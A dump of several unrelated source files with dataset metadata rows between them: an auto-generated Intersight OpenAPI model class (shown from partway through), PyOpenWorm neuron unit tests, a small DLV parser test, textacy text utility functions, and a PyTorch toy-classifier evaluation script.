'mod_time': 'ModTime', # noqa: E501
'moid': 'Moid', # noqa: E501
'owners': 'Owners', # noqa: E501
'shared_scope': 'SharedScope', # noqa: E501
'tags': 'Tags', # noqa: E501
'version_context': 'VersionContext', # noqa: E501
'ancestors': 'Ancestors', # noqa: E501
'parent': 'Parent', # noqa: E501
'permission_resources': 'PermissionResources', # noqa: E501
'display_names': 'DisplayNames', # noqa: E501
'aggregate_port_id': 'AggregatePortId', # noqa: E501
'port_id': 'PortId', # noqa: E501
'slot_id': 'SlotId', # noqa: E501
'port_policy': 'PortPolicy', # noqa: E501
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, class_id, object_type, *args, **kwargs): # noqa: E501
"""FabricTransceiverRole - a model defined in OpenAPI
Args:
class_id (str): The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data. The enum values provides the list of concrete types that can be instantiated from this abstract type.
object_type (str): The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property. The enum values provides the list of concrete types that can be instantiated from this abstract type.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
admin_speed (str): Admin configured speed for the port. * `Auto` - Admin configurable speed AUTO ( default ). * `1Gbps` - Admin configurable speed 1Gbps. * `10Gbps` - Admin configurable speed 10Gbps. * `25Gbps` - Admin configurable speed 25Gbps. * `40Gbps` - Admin configurable speed 40Gbps. * `100Gbps` - Admin configurable speed 100Gbps.. [optional] if omitted the server will use the default value of "Auto" # noqa: E501
fec (str): Forward error correction configuration for the port. * `Auto` - Forward error correction option 'Auto'. * `Cl91` - Forward error correction option 'cl91'. * `Cl74` - Forward error correction option 'cl74'.. [optional] if omitted the server will use the default value of "Auto" # noqa: E501
account_moid (str): The Account ID for this managed object.. [optional] # noqa: E501
create_time (datetime): The time when this managed object was created.. [optional] # noqa: E501
domain_group_moid (str): The DomainGroup ID for this managed object.. [optional] # noqa: E501
mod_time (datetime): The time when this managed object was last modified.. [optional] # noqa: E501
moid (str): The unique identifier of this Managed Object instance.. [optional] # noqa: E501
owners ([str], none_type): [optional] # noqa: E501
shared_scope (str): Intersight provides pre-built workflows, tasks and policies to end users through global catalogs. Objects that are made available through global catalogs are said to have a 'shared' ownership. Shared objects are either made globally available to all end users or restricted to end users based on their license entitlement. Users can use this property to differentiate the scope (global or a specific license tier) to which a shared MO belongs.. [optional] # noqa: E501
tags ([MoTag], none_type): [optional] # noqa: E501
version_context (MoVersionContext): [optional] # noqa: E501
ancestors ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
parent (MoBaseMoRelationship): [optional] # noqa: E501
permission_resources ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
display_names (DisplayNames): [optional] # noqa: E501
aggregate_port_id (int): Breakout port Identifier of the Switch Interface. When a port is not configured as a breakout port, the aggregatePortId is set to 0, and unused. When a port is configured as a breakout port, the 'aggregatePortId' port number as labeled on the equipment, e.g. the id of the port on the switch.. [optional] # noqa: E501
port_id (int): Port Identifier of the Switch/FEX/Chassis Interface. When a port is not configured as a breakout port, the portId is the port number as labeled on the equipment, e.g. the id of the port on the switch, FEX or chassis. When a port is configured as a breakout port, the 'portId' represents the port id on the fanout side of the breakout cable.. [optional] # noqa: E501
slot_id (int): Slot Identifier of the Switch/FEX/Chassis Interface.. [optional] # noqa: E501
port_policy (FabricPortPolicyRelationship): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'class_id': class_id,
'object_type': object_type,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
FabricPortRole,
FabricTransceiverRoleAllOf,
],
'oneOf': [
],
}
| 54.184438
| 1,678
| 0.636794
|
import re
import sys
from intersight.model_utils import (
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from intersight.model.display_names import DisplayNames
from intersight.model.fabric_appliance_role import FabricApplianceRole
from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
from intersight.model.fabric_port_role import FabricPortRole
from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
from intersight.model.fabric_uplink_role import FabricUplinkRole
from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
from intersight.model.mo_tag import MoTag
from intersight.model.mo_version_context import MoVersionContext
globals()['DisplayNames'] = DisplayNames
globals()['FabricApplianceRole'] = FabricApplianceRole
globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
globals()['FabricPortRole'] = FabricPortRole
globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
globals()['FabricUplinkRole'] = FabricUplinkRole
globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
globals()['MoTag'] = MoTag
globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
allowed_values = {
('class_id',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('object_type',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('admin_speed',): {
'AUTO': "Auto",
'1GBPS': "1Gbps",
'10GBPS': "10Gbps",
'25GBPS': "25Gbps",
'40GBPS': "40Gbps",
'100GBPS': "100Gbps",
},
('fec',): {
'AUTO': "Auto",
'CL91': "Cl91",
'CL74': "Cl74",
},
}
validations = {
('aggregate_port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 0,
},
('port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 1,
},
('slot_id',): {
'inclusive_maximum': 5,
'inclusive_minimum': 1,
},
}
@cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,)
_nullable = False
@cached_property
def openapi_types():
lazy_import()
return {
'class_id': (str,),
'object_type': (str,),
'admin_speed': (str,),
'fec': (str,),
'account_moid': (str,),
'create_time': (datetime,),
'domain_group_moid': (str,),
'mod_time': (datetime,),
'moid': (str,),
'owners': ([str], none_type,),
'shared_scope': (str,),
'tags': ([MoTag], none_type,),
'version_context': (MoVersionContext,),
'ancestors': ([MoBaseMoRelationship], none_type,),
'parent': (MoBaseMoRelationship,),
'permission_resources': ([MoBaseMoRelationship], none_type,),
'display_names': (DisplayNames,),
'aggregate_port_id': (int,),
'port_id': (int,),
'slot_id': (int,),
'port_policy': (FabricPortPolicyRelationship,),
}
@cached_property
def discriminator():
lazy_import()
val = {
'fabric.ApplianceRole': FabricApplianceRole,
'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
'fabric.UplinkRole': FabricUplinkRole,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId',
'object_type': 'ObjectType',
'admin_speed': 'AdminSpeed',
'fec': 'Fec',
'account_moid': 'AccountMoid',
'create_time': 'CreateTime',
'domain_group_moid': 'DomainGroupMoid',
'mod_time': 'ModTime',
'moid': 'Moid',
'owners': 'Owners',
'shared_scope': 'SharedScope',
'tags': 'Tags',
'version_context': 'VersionContext',
'ancestors': 'Ancestors',
'parent': 'Parent',
'permission_resources': 'PermissionResources',
'display_names': 'DisplayNames',
'aggregate_port_id': 'AggregatePortId',
'port_id': 'PortId',
'slot_id': 'SlotId',
'port_policy': 'PortPolicy',
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, class_id, object_type, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'class_id': class_id,
'object_type': object_type,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
FabricPortRole,
FabricTransceiverRoleAllOf,
],
'oneOf': [
],
}
| true
| true
|
f7191914c7488e7767557e9c0a804a86c906515e
| 4,350
|
py
|
Python
|
tests/NeuronTest.py
|
jaideep-seth/PyOpenWorm
|
c36baeda9590334ba810296934973da34f0eab78
|
[
"MIT"
] | 1
|
2019-03-22T12:02:36.000Z
|
2019-03-22T12:02:36.000Z
|
tests/NeuronTest.py
|
BioComSoftware/PyOpenWorm
|
32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f
|
[
"MIT"
] | null | null | null |
tests/NeuronTest.py
|
BioComSoftware/PyOpenWorm
|
32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
ctx_classes = (Neuron, Connection)
def setUp(self):
_DataTest.setUp(self)
self.neur = lambda x: self.ctx.Neuron(name=x)
def test_Cell(self):
do = self.neur('BDUL')
self.assertTrue(isinstance(do, Cell))
def test_receptors(self):
n = self.neur('AVAL')
n.receptor('GLR-2')
self.save()
self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
def test_same_name_same_id(self):
"""
Test that two Neuron objects with the same name have the same
identifier. Saves us from having too many inserts of the same object.
"""
c = Neuron(name="boots")
c1 = Neuron(name="boots")
self.assertEqual(c.identifier, c1.identifier)
def test_type(self):
n = self.neur('AVAL')
n.type('interneuron')
self.save()
self.assertEqual('interneuron', self.neur('AVAL').type.one())
def test_name(self):
"""
Test that the name property is set when the neuron is initialized
with it
"""
self.assertEqual('AVAL', self.neur('AVAL').name())
self.assertEqual('AVAR', self.neur('AVAR').name())
def test_neighbor(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
neighbors = list(n.neighbor())
self.assertIn(self.neur('PVCL'), neighbors)
self.save()
self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
def test_neighbor_count(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.save()
p = self.ctx.Neuron()
self.neur('AVAL').neighbor(p)
self.assertEqual(1, p.count())
def test_neighbor_count_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.assertEqual(1, n.neighbor.count())
def test_neighbor_count_context_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
ctx1 = Context(ident='http://example.org/ctx1')
self.assertEqual(0, ctx1(n).neighbor.count())
def test_connection_count(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.save()
self.assertEqual(1, self.neur('AVAL').connection.count())
def test_connection_count_staged(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.assertEqual(1, n.connection.count())
def test_neighbor_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.neighbor(n1)
self.assertEqual(set(), set(ctx1(n0).neighbor()))
def test_connection_get_staged(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(1, len(n0.connection()))
def test_connection_only_defined(self):
n0 = self.ctx.Neuron(name='NEURON0')
n0.connection(self.ctx.Connection())
self.assertEqual(0, len(n0.connection()))
def test_connection_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(set(), set(ctx1(n0).connection()))
def test_init_from_lineage_name(self):
c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
self.save()
for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
print(' '.join(y.n3() for y in x))
c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
print(c.context)
self.assertEqual(c.name(), 'ADAL')
| 35.365854
| 85
| 0.624828
|
from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
ctx_classes = (Neuron, Connection)
def setUp(self):
_DataTest.setUp(self)
self.neur = lambda x: self.ctx.Neuron(name=x)
def test_Cell(self):
do = self.neur('BDUL')
self.assertTrue(isinstance(do, Cell))
def test_receptors(self):
n = self.neur('AVAL')
n.receptor('GLR-2')
self.save()
self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
def test_same_name_same_id(self):
c = Neuron(name="boots")
c1 = Neuron(name="boots")
self.assertEqual(c.identifier, c1.identifier)
def test_type(self):
n = self.neur('AVAL')
n.type('interneuron')
self.save()
self.assertEqual('interneuron', self.neur('AVAL').type.one())
def test_name(self):
self.assertEqual('AVAL', self.neur('AVAL').name())
self.assertEqual('AVAR', self.neur('AVAR').name())
def test_neighbor(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
neighbors = list(n.neighbor())
self.assertIn(self.neur('PVCL'), neighbors)
self.save()
self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
def test_neighbor_count(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.save()
p = self.ctx.Neuron()
self.neur('AVAL').neighbor(p)
self.assertEqual(1, p.count())
def test_neighbor_count_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
self.assertEqual(1, n.neighbor.count())
def test_neighbor_count_context_staged(self):
n = self.neur('AVAL')
n.neighbor(self.neur('PVCL'), syntype='send')
ctx1 = Context(ident='http://example.org/ctx1')
self.assertEqual(0, ctx1(n).neighbor.count())
def test_connection_count(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.save()
self.assertEqual(1, self.neur('AVAL').connection.count())
def test_connection_count_staged(self):
n = self.neur('AVAL')
n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
self.assertEqual(1, n.connection.count())
def test_neighbor_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.neighbor(n1)
self.assertEqual(set(), set(ctx1(n0).neighbor()))
def test_connection_get_staged(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(1, len(n0.connection()))
def test_connection_only_defined(self):
n0 = self.ctx.Neuron(name='NEURON0')
n0.connection(self.ctx.Connection())
self.assertEqual(0, len(n0.connection()))
def test_connection_context(self):
n0 = self.ctx.Neuron(name='NEURON0')
n1 = self.ctx.Neuron(name='NEURON1')
ctx1 = Context(ident='http://example.org/ctx1')
n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
self.assertEqual(set(), set(ctx1(n0).connection()))
def test_init_from_lineage_name(self):
c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
self.save()
for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
print(' '.join(y.n3() for y in x))
c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
print(c.context)
self.assertEqual(c.name(), 'ADAL')
| true
| true
|
f719199aa68ef685b796249b0f94249df6e5c02f
| 105
|
py
|
Python
|
tests/parser/query.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/query.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/query.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a.
x | d :- a.
c :- b.
c?
"""
output = """
a.
x | d :- a.
c :- b.
c?
"""
| 5.526316
| 12
| 0.238095
|
input = """
a.
x | d :- a.
c :- b.
c?
"""
output = """
a.
x | d :- a.
c :- b.
c?
"""
| true
| true
|
f7191a9344d5198ccde86f8f184716fe9107a381
| 5,646
|
py
|
Python
|
textacy/text_utils.py
|
tbsexton/textacy
|
964614213c7261f91f09c106334269388d45f790
|
[
"Apache-2.0"
] | null | null | null |
textacy/text_utils.py
|
tbsexton/textacy
|
964614213c7261f91f09c106334269388d45f790
|
[
"Apache-2.0"
] | null | null | null |
textacy/text_utils.py
|
tbsexton/textacy
|
964614213c7261f91f09c106334269388d45f790
|
[
"Apache-2.0"
] | null | null | null |
"""
Text Utils
----------
Set of small utility functions that take text strings as input.
"""
import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
"""
Pass single token as a string, return True/False if is/is not valid acronym.
Args:
token: Single word to check for acronym-ness
exclude: If technically valid but not actually good acronyms are known in advance,
pass them in as a set of strings; matching tokens will return False.
Returns:
Whether or not ``token`` is an acronym.
"""
# exclude certain valid acronyms from consideration
if exclude and token in exclude:
return False
# don't allow empty strings
if not token:
return False
# don't allow spaces
if " " in token:
return False
# 2-character acronyms can't have lower-case letters
if len(token) == 2 and not token.isupper():
return False
# acronyms can't be all digits
if token.isdigit():
return False
# acronyms must have at least one upper-case letter or start/end with a digit
if not any(char.isupper() for char in token) and not (
token[0].isdigit() or token[-1].isdigit()
):
return False
# acronyms must have between 2 and 10 alphanumeric characters
if not 2 <= sum(1 for char in token if char.isalnum()) <= 10:
return False
# only certain combinations of letters, digits, and '&/.-' allowed
if not constants.RE_ACRONYM.match(token):
return False
return True
def keyword_in_context(
text: str,
keyword: str,
*,
ignore_case: bool = True,
window_width: int = 50,
print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
"""
Search for ``keyword`` in ``text`` via regular expression, return or print strings
spanning ``window_width`` characters before and after each occurrence of keyword.
Args:
text: Text in which to search for ``keyword``.
keyword: Technically, any valid regular expression string should work,
but usually this is a single word or short phrase: "spam", "spam and eggs";
to account for variations, use regex: "[Ss]pam (and|&) [Ee]ggs?"
.. note:: If keyword contains special characters, be sure to escape them!
ignore_case: If True, ignore letter case in ``keyword`` matching.
window_width: Number of characters on either side of ``keyword``
to include as "context".
print_only: If True, print out all results with nice formatting;
if False, return all (pre, kw, post) matches as generator of raw strings.
Yields:
Next 3-tuple of prior context, the match itself, and posterior context.
"""
flags = re.IGNORECASE if ignore_case is True else 0
if print_only is True:
for match in re.finditer(keyword, text, flags=flags):
line = "{pre} {kw} {post}".format(
pre=text[max(0, match.start() - window_width) : match.start()].rjust(
window_width
),
kw=match.group(),
post=text[match.end() : match.end() + window_width].ljust(window_width),
)
print(line)
else:
for match in re.finditer(keyword, text, flags=flags):
yield (
text[max(0, match.start() - window_width) : match.start()],
match.group(),
text[match.end() : match.end() + window_width],
)
KWIC = keyword_in_context
"""Alias of :func:`keyword_in_context <textacy.text_utils.keyword_in_context>`."""
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
"""
Clean up a sequence of single- or multi-word strings: strip leading/trailing
junk chars, handle dangling parens and odd hyphenation, etc.
Args:
terms: Sequence of terms such as "presidency", "epic failure",
or "George W. Bush" that may be _unclean_ for whatever reason.
Yields:
Next term in `terms` but with the cruft cleaned up, excluding terms
that were _entirely_ cruft
Warning:
Terms with (intentionally) unusual punctuation may get "cleaned"
into a form that changes or obscures the original meaning of the term.
"""
# get rid of leading/trailing junk characters
terms = (constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", term) for term in terms)
terms = (constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term) for term in terms)
# handle dangling/backwards parens, don't allow '(' or ')' to appear without the other
terms = (
""
if term.count(")") != term.count("(") or term.find(")") < term.find("(")
else term
if "(" not in term
else constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
for term in terms
)
# handle oddly separated hyphenated words
terms = (
term
if "-" not in term
else constants.RE_NEG_DIGIT_TERM.sub(
r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
)
for term in terms
)
# handle oddly separated apostrophe'd words
terms = (
constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term) if "'" in term else term
for term in terms
)
# normalize whitespace
terms = (constants.RE_NONBREAKING_SPACE.sub(" ", term).strip() for term in terms)
for term in terms:
if re.search(r"\w", term):
yield term
| 35.734177
| 90
| 0.626993
|
import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
if exclude and token in exclude:
return False
if not token:
return False
# don't allow spaces
if " " in token:
return False
if len(token) == 2 and not token.isupper():
return False
# acronyms can't be all digits
if token.isdigit():
return False
if not any(char.isupper() for char in token) and not (
token[0].isdigit() or token[-1].isdigit()
):
return False
if not 2 <= sum(1 for char in token if char.isalnum()) <= 10:
return False
if not constants.RE_ACRONYM.match(token):
return False
return True
def keyword_in_context(
text: str,
keyword: str,
*,
ignore_case: bool = True,
window_width: int = 50,
print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
flags = re.IGNORECASE if ignore_case is True else 0
if print_only is True:
for match in re.finditer(keyword, text, flags=flags):
line = "{pre} {kw} {post}".format(
pre=text[max(0, match.start() - window_width) : match.start()].rjust(
window_width
),
kw=match.group(),
post=text[match.end() : match.end() + window_width].ljust(window_width),
)
print(line)
else:
for match in re.finditer(keyword, text, flags=flags):
yield (
text[max(0, match.start() - window_width) : match.start()],
match.group(),
text[match.end() : match.end() + window_width],
)
KWIC = keyword_in_context
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
terms = (constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", term) for term in terms)
terms = (constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term) for term in terms)
terms = (
""
if term.count(")") != term.count("(") or term.find(")") < term.find("(")
else term
if "(" not in term
else constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
for term in terms
)
# handle oddly separated hyphenated words
terms = (
term
if "-" not in term
else constants.RE_NEG_DIGIT_TERM.sub(
r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
)
for term in terms
)
# handle oddly separated apostrophe'd words
terms = (
constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term) if "'" in term else term
for term in terms
)
# normalize whitespace
terms = (constants.RE_NONBREAKING_SPACE.sub(" ", term).strip() for term in terms)
for term in terms:
if re.search(r"\w", term):
yield term
| true
| true
|
f7191add8f756794b4712383067b7b7dd7494a69
| 3,495
|
py
|
Python
|
toyClassification/MC-Dropout-MAP-01-Adam/eval.py
|
frezaeix/evaluating_bdl
|
bd0a464981c18de8479b6be2d91867527016c8d3
|
[
"MIT"
] | null | null | null |
toyClassification/MC-Dropout-MAP-01-Adam/eval.py
|
frezaeix/evaluating_bdl
|
bd0a464981c18de8479b6be2d91867527016c8d3
|
[
"MIT"
] | null | null | null |
toyClassification/MC-Dropout-MAP-01-Adam/eval.py
|
frezaeix/evaluating_bdl
|
bd0a464981c18de8479b6be2d91867527016c8d3
|
[
"MIT"
] | null | null | null |
# code-checked
# server-checked
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
M = 4
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
network.eval()
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
for x_2_i, x_2_value in enumerate(x_values):
x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda() # (shape: (1, 2))
mean_prob_vector = np.zeros((2, ))
for i in range(M):
logits = network(x) # (shape: (1, num_classes)) (num_classes==2)
prob_vector = F.softmax(logits, dim=1) # (shape: (1, num_classes))
prob_vector = prob_vector.data.cpu().numpy()[0] # (shape: (2, ))
mean_prob_vector += prob_vector/M_float
false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
